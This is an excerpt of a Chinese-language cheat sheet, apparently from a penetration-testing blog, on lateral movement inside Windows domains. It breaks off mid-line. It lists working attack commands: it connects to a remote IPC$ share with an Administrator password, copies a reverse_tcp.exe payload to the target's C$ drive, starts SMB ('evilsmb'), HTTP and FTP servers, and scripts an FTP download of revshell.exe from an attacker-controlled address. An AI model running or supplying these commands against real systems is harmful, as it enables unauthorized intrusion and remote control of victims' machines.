域渗透-横向移动命令总结

文章预览

横向移动 0x01 文件传输 IPC$ 建立IPC$连接需要具备以下两个条件：①远程主机开启了IPC连接。 ②远程主机的139端口和445端口开放。 net use \\10.10.10.19\IPC$ "admin@123" /user:"Administrator" #建立连接 dir \\10.10.10.19\C$ #列出目标C盘的目录 copy .\reverse_tcp.exe \\10.10.10.19\C$ #将当前目录文件拷贝到目标C盘 搭建SMB服务器 mkdir /root/share python smbserver.py evilsmb /root/share -smb2support 搭建HTTP服务器 python -m SimpleHTTPServer 1234 python3 -m http.server 1234 搭建FTP服务器 #ftp非交互式下载文件 python3 -m pyftpdlib -p 21 echo open 10.10.16.3 21> ftp.txt USER anonymous >> ftp.txt anonymous>> ftp.txt bin>> ftp.txt GET revshell.exe >> ftp.txt bye>> ftp.txt #在目标机器上写文件 #关于上面命令的解释： #open 10.10.16.3 21 连接FTP服务器 21端口 #USER anonymous 用户名anonymous #pass 密码随 ………………………………